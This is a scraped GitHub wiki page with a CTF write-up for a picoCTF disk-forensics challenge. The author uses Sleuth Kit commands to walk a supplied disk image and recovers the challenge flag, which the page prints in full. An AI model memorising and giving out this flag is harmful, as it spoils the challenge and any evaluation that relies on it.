stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>Download this disk image and find the flag.Note: if you are using the webshell, download and extract the disk image into /tmp not your home directory.<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>disk.flag.img<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>This challenge is a typical disk analysis challenge so I prefer to use the sleuth kit tool as the title hints !<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>So as a first step I tried to see the partition table by running mmls disk.flag.img :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:23]└─[$] <> mmls disk.flag.img DOS Partition TableOffset Sector: 0Units are in 512-byte sectors Download this disk image and find the flag. Note: if you are using the webshell, download and extract the disk image into /tmp not your home directory. So as a first step I tried to see the partition table by running mmls disk.flag.img : Slot Start End Length Description000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)001: ------- 0000000000 0000002047 0000002048 Unallocated002: 000:000 0000002048 0000206847 0000204800 Linux (0x83)003: 000:001 0000206848 0000360447 0000153600 Linux Swap / Solaris x86 (0x82)004: 000:002 0000360448 0000614399 0000253952 Linux (0x83)">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:23]└─[$] <> mmls disk.flag.img DOS Partition TableOffset Sector: 0Units are in 512-byte sectors Slot Start End Length Description000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)001: ------- 0000000000 0000002047 0000002048 Unallocated002: 000:000 0000002048 0000206847 0000204800 Linux (0x83)003: 000:001 0000206848 0000360447 0000153600 Linux Swap / Solaris x86 (0x82)004: 000:002 0000360448 0000614399 0000253952 Linux (0x83)</div>Hmmmm.. the last partition seems interesting ! let's go ahead and list it using fls -o 360448 disk.flag.img :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:24]└─[$] <> fls -o 360448 disk.flag.img d/d 451: homed/d 11: lost+foundd/d 12: bootd/d 1985: etcd/d 1986: procd/d 1987: devd/d 1988: tmpd/d 1989: libd/d 1990: vard/d 3969: usrd/d 3970: bind/d 1991: sbind/d 1992: mediad/d 1993: mntd/d 1994: optd/d 1995: rootd/d 1996: rund/d 1997: srvd/d 1998: sysd/d 2358: swapV/V 31745: $OrphanFiles">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:24]└─[$] <> fls -o 360448 disk.flag.img d/d 451: homed/d 11: lost+foundd/d 12: bootd/d 1985: etcd/d 1986: procd/d 1987: devd/d 1988: tmpd/d 1989: libd/d 1990: vard/d 3969: usrd/d 3970: bind/d 1991: sbind/d 1992: mediad/d 1993: mntd/d 1994: optd/d 1995: rootd/d 1996: rund/d 1997: srvd/d 1998: sysd/d 2358: swapV/V 31745: $OrphanFiles</div>Oh root I'm coming after you ! running fls -o 360448 disk.flag.img 1995 we get :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:34]└─[$] <> fls -o 360448 disk.flag.img 1995 r/r 2363: .ash_historyd/d 3981: my_folder">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:34]└─[$] <> fls -o 360448 disk.flag.img 1995 r/r 2363: .ash_historyd/d 3981: my_folder</div>Seems like there's a folder here, let's investigate using fls -o 360448 disk.flag.img 3981 :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:35]└─[$] <> fls -o 360448 disk.flag.img 3981 r/r * 2082(realloc): flag.txtr/r 2371: flag.uni.txt">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:35]└─[$] <> fls -o 360448 disk.flag.img 3981 r/r * 2082(realloc): flag.txtr/r 2371: flag.uni.txt</div>Bingo ! I think we're up to something with that file ! we run icat -o 360448 disk.flag.img 2371 and voila ! :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:37]└─[$] <> icat -o 360448 disk.flag.img 2371picoCTF{by73_5urf3r_42028120}">┌─[not1cyyy@0x45] - [~/Desktop/picoCTF/sleuthkit_apprentice_FINISHED] - [lun. avril 18, 01:37]└─[$] <> icat -o 360448 disk.flag.img 2371picoCTF{by73_5urf3r_42028120}</div><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>picoCTF{by73_5urf3r_42028120} Hmmmm.. the last partition seems interesting ! let's go ahead and list it using fls -o 360448 disk.flag.img : Oh root I'm coming after you ! running fls -o 360448 disk.flag.img 1995 we get : Seems like there's a folder here, let's investigate using fls -o 360448 disk.flag.img 3981 : Bingo ! I think we're up to something with that file ! we run icat -o 360448 disk.flag.img 2371 and voila ! : picoCTF{by73_5urf3r_42028120} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" /> <meta name="optimizely-datafile" content="{"groups": [], "environmentKey": "production", "rollouts": [], "typedAudiences": [], "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [], "version": "4", "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "anonymizeIP": true, "sdkKey": "WTc6awnGuYDdG98CYRban", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}, {"id": "21656311196", "key": "opened_downgrade_dialog"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": [], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": 